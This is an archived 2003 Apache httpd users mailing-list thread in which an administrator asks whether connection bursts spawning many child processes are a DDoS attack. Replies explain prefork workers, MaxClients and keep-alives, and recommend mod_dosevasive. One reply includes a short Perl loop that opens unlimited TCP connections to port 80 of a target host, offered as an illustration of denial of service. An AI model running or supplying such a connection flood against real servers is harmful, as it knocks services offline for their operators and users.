You are viewing a plain text version of this content. The canonical link for it is here.
Posted to users@httpd.apache.org by Gil Disatnik <gi...@disatnik.com> on 2003/10/15 13:22:00 UTC
[users@httpd] Possible DDOS attack... ?
Hello there,
Every once in a while apache goes mad on one my servers and spawns many new
child processes in a very short period of time (< a minute)
I have started investigating the issue using a cronned script that records
the system information only when under resources stress (ps, free, catting
/proc/user_beancounters (this is a collocated server), netstat)
In addition I have changed apache's loglevel to debug in a hope to see more
information (other than crying that it has to spawn many new childs and not
having enough spare servers, I did not get any useful information...)
I will get straight to the business:
When the system gets too loaded with apache child processes netstat shows this:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
........ Irrelevant lines removed .........
tcp 0 0 61.112.113.115:80 213.132.85.114:1957 SYN_RECV
tcp 0 0
61.112.113.115:80 213.132.85.114:1928 ESTABLISHED
tcp 0 0
61.112.113.115:80 213.132.85.114:1933 ESTABLISHED
tcp 0 0
61.112.113.115:80 213.132.85.114:1935 ESTABLISHED
tcp 0 0
61.112.113.115:80 213.132.85.114:1934 ESTABLISHED
tcp 0 0
61.112.113.115:80 213.132.85.114:1945 ESTABLISHED
tcp 0 0
61.112.113.115:80 213.132.85.114:1944 ESTABLISHED
tcp 0 0
61.112.113.115:80 213.132.85.114:1947 ESTABLISHED
tcp 0 0
61.112.113.115:80 213.132.85.114:1946 ESTABLISHED
tcp 0 0
61.112.113.115:80 213.132.85.114:1949 ESTABLISHED
tcp 0 0
61.112.113.115:80 213.132.85.114:1948 ESTABLISHED
tcp 0 0
61.112.113.115:80 213.132.85.114:1951 ESTABLISHED
tcp 0 0
61.112.113.115:80 213.132.85.114:1950 ESTABLISHED
tcp 0 0
61.112.113.115:80 213.132.85.114:1937 ESTABLISHED
tcp 0 0
61.112.113.115:80 213.132.85.114:1936 ESTABLISHED
tcp 0 0
61.112.113.115:80 213.132.85.114:1939 ESTABLISHED
tcp 0 0
61.112.113.115:80 213.132.85.114:1938 ESTABLISHED
tcp 0 0
61.112.113.115:80 213.132.85.114:1941 ESTABLISHED
tcp 0 0
61.112.113.115:80 213.132.85.114:1940 ESTABLISHED
tcp 0 0
61.112.113.115:80 213.132.85.114:1943 ESTABLISHED
tcp 0 0
61.112.113.115:80 213.132.85.114:1942 ESTABLISHED
tcp 0 0
61.112.113.115:80 213.132.85.114:1961 ESTABLISHED
tcp 0 0
61.112.113.115:80 213.132.85.114:1960 ESTABLISHED
tcp 0 0
61.112.113.115:80 213.132.85.114:1963 ESTABLISHED
tcp 0 0
61.112.113.115:80 213.132.85.114:1962 ESTABLISHED
tcp 0 0
61.112.113.115:80 213.132.85.114:1965 ESTABLISHED
tcp 0 0
61.112.113.115:80 213.132.85.114:1964 ESTABLISHED
tcp 0 0
61.112.113.115:80 213.132.85.114:1967 ESTABLISHED
tcp 0 0
61.112.113.115:80 213.132.85.114:1966 ESTABLISHED
tcp 0 0
61.112.113.115:80 213.132.85.114:1953 ESTABLISHED
tcp 0 0
61.112.113.115:80 213.132.85.114:1952 ESTABLISHED
tcp 0 0
61.112.113.115:80 213.132.85.114:1955 ESTABLISHED
tcp 0 0
61.112.113.115:80 213.132.85.114:1954 ESTABLISHED
tcp 0 0
61.112.113.115:80 213.132.85.114:1956 ESTABLISHED
tcp 0 0
61.112.113.115:80 213.132.85.114:1959 ESTABLISHED
tcp 0 0
61.112.113.115:80 213.132.85.114:1958 ESTABLISHED
tcp 0 0
61.112.113.115:80 213.132.85.114:1969 ESTABLISHED
tcp 0 0
61.112.113.115:80 213.132.85.114:1968 ESTABLISHED
tcp 0 0
61.112.113.115:80 213.132.85.114:1971 ESTABLISHED
tcp 0 0
61.112.113.115:80 213.132.85.114:1970 ESTABLISHED
tcp 0 0
61.112.113.115:80 213.132.85.114:1973 ESTABLISHED
tcp 0 0
61.112.113.115:80 213.132.85.114:1972 ESTABLISHED
tcp 0 0
61.112.113.115:80 213.132.85.114:1974 ESTABLISHED
tcp 0 0 142.61.13.11:80 84.218.48.175:2013 ESTABLISHED
tcp 0 0 142.61.13.11:80 84.218.48.175:2015 ESTABLISHED
tcp 0 0 142.61.13.11:80 84.218.48.175:2024 ESTABLISHED
tcp 0 0 142.61.13.11:80 84.218.48.175:2020 ESTABLISHED
tcp 0 0 142.61.13.11:80 84.218.48.175:2021 ESTABLISHED
tcp 0 0 142.61.13.11:80 84.218.48.175:2022 ESTABLISHED
tcp 0 0 142.61.13.11:80 84.218.48.175:2023 ESTABLISHED
tcp 0 0 142.61.13.11:80 84.218.48.175:2019 ESTABLISHED
As you can see, a single IP is connecting to 61.112.113.115 and a different
single IP is connecting to 142.61.13.11
ps output shows that all servers were spawned in under a minute.
Does that seem like an attack? should I start contacting the relevant ISPs?
(IP addresses are different from one "attack" to another, however most of
them belong to the same ISP).
(Ip addresses listed here are not the real ones)
Thanks.
Regards
Gil Disatnik
UNIX system administrator.
GibsonLP@EFnet
http://gil.disatnik.com
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
apt-get install slackware
--------------------------------------------------------------------
"Windows NT has detected mouse movement, you MUST restart
your computer before the new settings will take effect, [ OK ]"
--------------------------------------------------------------------
Windows is a 32 bit patch to a 16 bit GUI based on a 8 bit operating
system, written for a 4 bit processor by a 2 bit company which can
not stand 1 bit of competition.
-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: [users@httpd] Possible DDOS attack... ?
Posted by Brian Dessent <br...@dessent.net>.
Gil Disatnik wrote:
> Access log shows the following on the client connecting:
> Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
>
> however - it does show it requests around the many elements concurrently
>
> Maybe it's a user who tweaked his IE to gain "extra speed"?
Could very well be. There's a registry key that you can change that
sets this value. I think it defaults to 2 for http/1.0 connections and
4 for http/1.1. I am pretty sure I've seen more than one of these
"internet connection optimizer" programs that screw around with these
settings.
> concurrent gets, I simply wish to make sure apache will not spawn more than
> 4 childs to attend each client request, and in a case a client tries to get
> more than 4 - apache shall simply let his gets to wait until previous gets
> have finished... Is there a way to do that?
I don't think that's possible. Apache doesn't know anything about who
is making each request. All it knows is that when a request comes in,
it has three options: hand it off to an idle worker, create an idle
worker if one doesn't exist and # < MaxClients, or let the request wait
in the listen queue until there is a free worker. And I'm not sure
here, but once Apache calls accept() on a connection, there's no way to
undo that and "put it back in the queue." So in other words, in order
to attempt to do what you want, Apache would have to first accept the
connection (so that it could determine who's on the other end) but once
it's done this it now has that connection in the open state, there's no
way to undo that and put it back in the queue. I suppose it could let
the connection dangle and not hand it off to a worker, but I'm not sure
if that would scale very well -- it might make Apache more vulnerable to
a denial of service attack. It's much safer if you don't accept() the
connection until you're ready to deal with it and let the TCP/IP stack
manage the queue.
Brian
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: [users@httpd] Possible DDOS attack... ?
Posted by Gil Disatnik <gi...@disatnik.com>.
I think I understand, however - Apache never got above that limitation once
I limited it, I limited it only because when it spawned more than 110 or so
childs - the system got too busy (not a very strong server, and it does
other tasks as well...)
Access log shows the following on the client connecting:
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
however - it does show it requests around the many elements concurrently
Maybe it's a user who tweaked his IE to gain "extra speed"?
I have read a bit about mod_dosevasive, I am not sure how much would that
help, I don't want to DENY access to users trying to have too many
concurrent gets, I simply wish to make sure apache will not spawn more than
4 childs to attend each client request, and in a case a client tries to get
more than 4 - apache shall simply let his gets to wait until previous gets
have finished... Is there a way to do that?
Thanks.
At 08:19 PM 10/18/2003, you wrote:
>Gil Disatnik wrote:
>
> > If I understand you right - a misconfigured client can result in spawning
> > many apache childs?
> > I always thought that apache has 1 child per session regardless to the http
> > connections the client is opening, and even if a user opens more of the
> > same browser he uses - apache should still have a single child attending to
> > this session.
>
>I think you should drop the notion of a "session" as it just doesn't
>exist. Software can create it on top of http (i.e. php with cookies
>and/or sessionID's) but at the http and Apache level there is no such
>thing as a session. Requests come in, and they're delegated to an idle
>worker process -- that's all that Apache knows about. Http is
>completely stateless as they say.
>
>However, there's one other aspect of TCP/IP that you're probably
>referring to, and that's the "lingering". Once the socket connection is
>closed, the listening end lingers for some time period in case the
>remote end re-establishes the connection...and the connection can be
>setup again with less overhead than if everything had started over. So
>in the case of a client making a number of sequential connections, they
>should all be handled by the same worker process.
>
>However, if the client on the other end spawns all these connections
>simultaneously rather than serially, it will cause each one to be sent
>to a different idle worker (and more workers will be created if the
>number idle drops too low.) I think most browsers are configured by
>default to not initiate more than 4 simultaneous connections to any
>given server, for this very reason. Although if the client is running
>some kind of misbehaived "website sluper" tool, or has changed the
>settings in their browser it's certainly conceivable that they could
>initiate many simultaneous connections, causing Apache to make more
>workers. I don't really see any way around this, as Apache's only way
>of dealing with a burst of connections is to make enough workers to
>handle them all, or let them wait in the listen queue if it's already at
>MaxClients.
>
> > So, what do you say? if it is indeed misconfigured clients, what can I do
> > about it? more than 110 apache processes will choke the server, I find it a
> > bit annoying that a single user going to a heavy page will spawn so many
> > child processes...
> > I have:
> > MinSpareServers 10
> > MaxSpareServers 20
> > MaxClients 105
>
>If you set MaxClients to 105 then you should never see more than 105
>httpd processes running (plus the one additional controller process.)
>MaxClients is meant to limit the amount of resources that Apache can
>take, so if it's going above that then there's definitely something
>weird. If this only happens infrequently then Apache should kill off a
>bunch of the idle workers after the connections stop, so it shouldn't
>have a lasting effect.
>
>I'd say your first step would be to look at the User-Agent of these
>requests, and if it's some oddball program just ban that program. If it
>really bothers you, look into mod_dosevasive, which keeps track of how
>many connections a given IP address has made in some time window. If
>too many are made in too short a time, it causes Apache to place that IP
>address on a temporary ban list, with an increasing back-off time if
>they continue.
>
>Brian
>
>---------------------------------------------------------------------
>The official User-To-User support forum of the Apache HTTP Server Project.
>See <URL:http://httpd.apache.org/userslist.html> for more info.
>To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> " from the digest: users-digest-unsubscribe@httpd.apache.org
>For additional commands, e-mail: users-help@httpd.apache.org
Regards
Gil Disatnik
UNIX system administrator.
GibsonLP@EFnet
http://gil.disatnik.com
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
apt-get install slackware
--------------------------------------------------------------------
"Windows NT has detected mouse movement, you MUST restart
your computer before the new settings will take effect, [ OK ]"
--------------------------------------------------------------------
Windows is a 32 bit patch to a 16 bit GUI based on a 8 bit operating
system, written for a 4 bit processor by a 2 bit company which can
not stand 1 bit of competition.
-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: [users@httpd] Possible DDOS attack... ?
Posted by Brian Dessent <br...@dessent.net>.
Gil Disatnik wrote:
> If I understand you right - a misconfigured client can result in spawning
> many apache childs?
> I always thought that apache has 1 child per session regardless to the http
> connections the client is opening, and even if a user opens more of the
> same browser he uses - apache should still have a single child attending to
> this session.
I think you should drop the notion of a "session" as it just doesn't
exist. Software can create it on top of http (i.e. php with cookies
and/or sessionID's) but at the http and Apache level there is no such
thing as a session. Requests come in, and they're delegated to an idle
worker process -- that's all that Apache knows about. Http is
completely stateless as they say.
However, there's one other aspect of TCP/IP that you're probably
referring to, and that's the "lingering". Once the socket connection is
closed, the listening end lingers for some time period in case the
remote end re-establishes the connection...and the connection can be
setup again with less overhead than if everything had started over. So
in the case of a client making a number of sequential connections, they
should all be handled by the same worker process.
However, if the client on the other end spawns all these connections
simultaneously rather than serially, it will cause each one to be sent
to a different idle worker (and more workers will be created if the
number idle drops too low.) I think most browsers are configured by
default to not initiate more than 4 simultaneous connections to any
given server, for this very reason. Although if the client is running
some kind of misbehaived "website sluper" tool, or has changed the
settings in their browser it's certainly conceivable that they could
initiate many simultaneous connections, causing Apache to make more
workers. I don't really see any way around this, as Apache's only way
of dealing with a burst of connections is to make enough workers to
handle them all, or let them wait in the listen queue if it's already at
MaxClients.
> So, what do you say? if it is indeed misconfigured clients, what can I do
> about it? more than 110 apache processes will choke the server, I find it a
> bit annoying that a single user going to a heavy page will spawn so many
> child processes...
> I have:
> MinSpareServers 10
> MaxSpareServers 20
> MaxClients 105
If you set MaxClients to 105 then you should never see more than 105
httpd processes running (plus the one additional controller process.)
MaxClients is meant to limit the amount of resources that Apache can
take, so if it's going above that then there's definitely something
weird. If this only happens infrequently then Apache should kill off a
bunch of the idle workers after the connections stop, so it shouldn't
have a lasting effect.
I'd say your first step would be to look at the User-Agent of these
requests, and if it's some oddball program just ban that program. If it
really bothers you, look into mod_dosevasive, which keeps track of how
many connections a given IP address has made in some time window. If
too many are made in too short a time, it causes Apache to place that IP
address on a temporary ban list, with an increasing back-off time if
they continue.
Brian
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: [users@httpd] Possible DDOS attack... ?
Posted by Robert Andersson <ro...@profundis.nu>.
Gil Disatnik wrote:
> If I understand you right - a misconfigured client can result in spawning
> many apache childs?
At their discretion, and it might not even be a misconfiguration.
> I always thought that apache has 1 child per session regardless to the
http
> connections the client is opening, and even if a user opens more of the
> same browser he uses - apache should still have a single child attending
to
> this session.
No, Apache will have one child per connection/request. The HTTP standard
says that a client SHOULD NOT establish more than two simultanious
connection to a host, but there is of course no guarantuee that this is
appriciated. Eg, this cute little scriptie could seriously fuck up any
server:
#!/usr/bin/perl
#####################################################################
for(my $i = 0; ; ++$i) {
my $socksym = "sock$i";
socket($socksym, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
connect($socksym, sockaddr_in(80, inet_aton("your.doomed.host")));
}
#####################################################################
Regards,
Robert Andersson
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: [users@httpd] Possible DDOS attack... ?
Posted by Gil Disatnik <gi...@disatnik.com>.
You are right, my bad... I am using 1.3.28
I have set MaxClients to 105 instead of the default because it used to kill
my machine.
If I understand you right - a misconfigured client can result in spawning
many apache childs?
I always thought that apache has 1 child per session regardless to the http
connections the client is opening, and even if a user opens more of the
same browser he uses - apache should still have a single child attending to
this session.
So, what do you say? if it is indeed misconfigured clients, what can I do
about it? more than 110 apache processes will choke the server, I find it a
bit annoying that a single user going to a heavy page will spawn so many
child processes...
I have:
MinSpareServers 10
MaxSpareServers 20
MaxClients 105
Thanks.
At 07:42 PM 10/15/2003, you wrote:
>Gil Disatnik wrote:
>
> > Actually - I do see a legitimate access on one of the virtual hosts access
> > log files, however, I see only a single GET for a one of the php files on
> > the server and then the other gets for the objects referred to by the php
> > output.
> > Could it be that apache is spawning a child process for every GET directive
> > even if it's the same session? could it be the user's client has a problem
> > and uses different session numbers all the time?
>
>Well, persistent connections/keep-alives are an optional thing. A
>client can open a new connection for every object that it retrieves, and
>this is perfectly valid http behaivor. Some clients and/or proxy
>servers just don't do persistent connections.
>
>As far as Apache and spawning, you didn't mention whether this is 1.x or
>2.x. In 1.x, Apache uses the "prefork" method, which basically means
>that it keeps a pool of workers, and if it sees that there are less than
>some minimum number of free workers it will spawn more, up to the limit
>of 'MaxClients'. So, if you only have a few workers and a lot of
>requests come in then Apache will spawn more, but it's not a 1:1 type of
>thing where every request causes a spawn -- that would result in
>terrible performance.
>
>Brian
>
>---------------------------------------------------------------------
>The official User-To-User support forum of the Apache HTTP Server Project.
>See <URL:http://httpd.apache.org/userslist.html> for more info.
>To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> " from the digest: users-digest-unsubscribe@httpd.apache.org
>For additional commands, e-mail: users-help@httpd.apache.org
Regards
Gil Disatnik
UNIX system administrator.
GibsonLP@EFnet
http://gil.disatnik.com
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
apt-get install slackware
--------------------------------------------------------------------
"Windows NT has detected mouse movement, you MUST restart
your computer before the new settings will take effect, [ OK ]"
--------------------------------------------------------------------
Windows is a 32 bit patch to a 16 bit GUI based on a 8 bit operating
system, written for a 4 bit processor by a 2 bit company which can
not stand 1 bit of competition.
-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: [users@httpd] Possible DDOS attack... ?
Posted by Brian Dessent <br...@dessent.net>.
Gil Disatnik wrote:
> Actually - I do see a legitimate access on one of the virtual hosts access
> log files, however, I see only a single GET for a one of the php files on
> the server and then the other gets for the objects referred to by the php
> output.
> Could it be that apache is spawning a child process for every GET directive
> even if it's the same session? could it be the user's client has a problem
> and uses different session numbers all the time?
Well, persistent connections/keep-alives are an optional thing. A
client can open a new connection for every object that it retrieves, and
this is perfectly valid http behaivor. Some clients and/or proxy
servers just don't do persistent connections.
As far as Apache and spawning, you didn't mention whether this is 1.x or
2.x. In 1.x, Apache uses the "prefork" method, which basically means
that it keeps a pool of workers, and if it sees that there are less than
some minimum number of free workers it will spawn more, up to the limit
of 'MaxClients'. So, if you only have a few workers and a lot of
requests come in then Apache will spawn more, but it's not a 1:1 type of
thing where every request causes a spawn -- that would result in
terrible performance.
Brian
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: [users@httpd] Possible DDOS attack... ?
Posted by kanarip <ka...@pczb.net>.
Maybe some person(s) just try to synchronize his local version of your
website, using dial up?
Or maybe someone mirrors your site?
Greets,
kanarip
----- Original Message -----
From: "Gil Disatnik" <gi...@disatnik.com>
To: <us...@httpd.apache.org>
Sent: Wednesday, October 15, 2003 7:22 PM
Subject: Re: [users@httpd] Possible DDOS attack... ?
> Thank you,
>
> Actually - I do see a legitimate access on one of the virtual hosts access
> log files, however, I see only a single GET for a one of the php files on
> the server and then the other gets for the objects referred to by the php
> output.
> Could it be that apache is spawning a child process for every GET
directive
> even if it's the same session? could it be the user's client has a problem
> and uses different session numbers all the time?
>
> I will check out mod_dosevasive, thanks!
>
> At 06:49 PM 10/15/2003, Brian Dessent wrote:
> >Gil Disatnik wrote:
> >
> > > As you can see, a single IP is connecting to 61.112.113.115 and a
different
> > > single IP is connecting to 142.61.13.11
> > > ps output shows that all servers were spawned in under a minute.
> > >
> > > Does that seem like an attack? should I start contacting the relevant
ISPs?
> > > (IP addresses are different from one "attack" to another, however most
of
> > > them belong to the same ISP).
> > > (Ip addresses listed here are not the real ones)
> >
> >Presumably there are accesslog entries for all these connections as
> >well? If there are actual legitimate requests associated with these
> >then tt could be a broken spider/robot/web cache or something that's
> >hammering the server trying to gulp down too much. Or is it someone
> >just creating connections to take up resources and not actually do
> >anything?
> >
> >In either case you may want to check out mod_dosevasive, which was
> >created for this very situation (limiting frequent connects from the
> >same remote host.)
> >
> >Brian
> >
> >---------------------------------------------------------------------
> >The official User-To-User support forum of the Apache HTTP Server
Project.
> >See <URL:http://httpd.apache.org/userslist.html> for more info.
> >To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> > " from the digest: users-digest-unsubscribe@httpd.apache.org
> >For additional commands, e-mail: users-help@httpd.apache.org
>
>
> Regards
>
> Gil Disatnik
> UNIX system administrator.
>
> GibsonLP@EFnet
> http://gil.disatnik.com
>
> _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
> apt-get install slackware
> --------------------------------------------------------------------
> "Windows NT has detected mouse movement, you MUST restart
> your computer before the new settings will take effect, [ OK ]"
> --------------------------------------------------------------------
> Windows is a 32 bit patch to a 16 bit GUI based on a 8 bit operating
> system, written for a 4 bit processor by a 2 bit company which can
> not stand 1 bit of competition.
> -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
>
>
> ---------------------------------------------------------------------
> The official User-To-User support forum of the Apache HTTP Server Project.
> See <URL:http://httpd.apache.org/userslist.html> for more info.
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> " from the digest: users-digest-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: [users@httpd] Possible DDOS attack... ?
Posted by Gil Disatnik <gi...@disatnik.com>.
Thank you,
Actually - I do see a legitimate access on one of the virtual hosts access
log files, however, I see only a single GET for a one of the php files on
the server and then the other gets for the objects referred to by the php
output.
Could it be that apache is spawning a child process for every GET directive
even if it's the same session? could it be the user's client has a problem
and uses different session numbers all the time?
I will check out mod_dosevasive, thanks!
At 06:49 PM 10/15/2003, Brian Dessent wrote:
>Gil Disatnik wrote:
>
> > As you can see, a single IP is connecting to 61.112.113.115 and a different
> > single IP is connecting to 142.61.13.11
> > ps output shows that all servers were spawned in under a minute.
> >
> > Does that seem like an attack? should I start contacting the relevant ISPs?
> > (IP addresses are different from one "attack" to another, however most of
> > them belong to the same ISP).
> > (Ip addresses listed here are not the real ones)
>
>Presumably there are accesslog entries for all these connections as
>well? If there are actual legitimate requests associated with these
>then tt could be a broken spider/robot/web cache or something that's
>hammering the server trying to gulp down too much. Or is it someone
>just creating connections to take up resources and not actually do
>anything?
>
>In either case you may want to check out mod_dosevasive, which was
>created for this very situation (limiting frequent connects from the
>same remote host.)
>
>Brian
>
>---------------------------------------------------------------------
>The official User-To-User support forum of the Apache HTTP Server Project.
>See <URL:http://httpd.apache.org/userslist.html> for more info.
>To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> " from the digest: users-digest-unsubscribe@httpd.apache.org
>For additional commands, e-mail: users-help@httpd.apache.org
Regards
Gil Disatnik
UNIX system administrator.
GibsonLP@EFnet
http://gil.disatnik.com
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
apt-get install slackware
--------------------------------------------------------------------
"Windows NT has detected mouse movement, you MUST restart
your computer before the new settings will take effect, [ OK ]"
--------------------------------------------------------------------
Windows is a 32 bit patch to a 16 bit GUI based on a 8 bit operating
system, written for a 4 bit processor by a 2 bit company which can
not stand 1 bit of competition.
-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: [users@httpd] Possible DDOS attack... ?
Posted by Brian Dessent <br...@dessent.net>.
Gil Disatnik wrote:
> As you can see, a single IP is connecting to 61.112.113.115 and a different
> single IP is connecting to 142.61.13.11
> ps output shows that all servers were spawned in under a minute.
>
> Does that seem like an attack? should I start contacting the relevant ISPs?
> (IP addresses are different from one "attack" to another, however most of
> them belong to the same ISP).
> (Ip addresses listed here are not the real ones)
Presumably there are accesslog entries for all these connections as
well? If there are actual legitimate requests associated with these
then tt could be a broken spider/robot/web cache or something that's
hammering the server trying to gulp down too much. Or is it someone
just creating connections to take up resources and not actually do
anything?
In either case you may want to check out mod_dosevasive, which was
created for this very situation (limiting frequent connects from the
same remote host.)
Brian
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org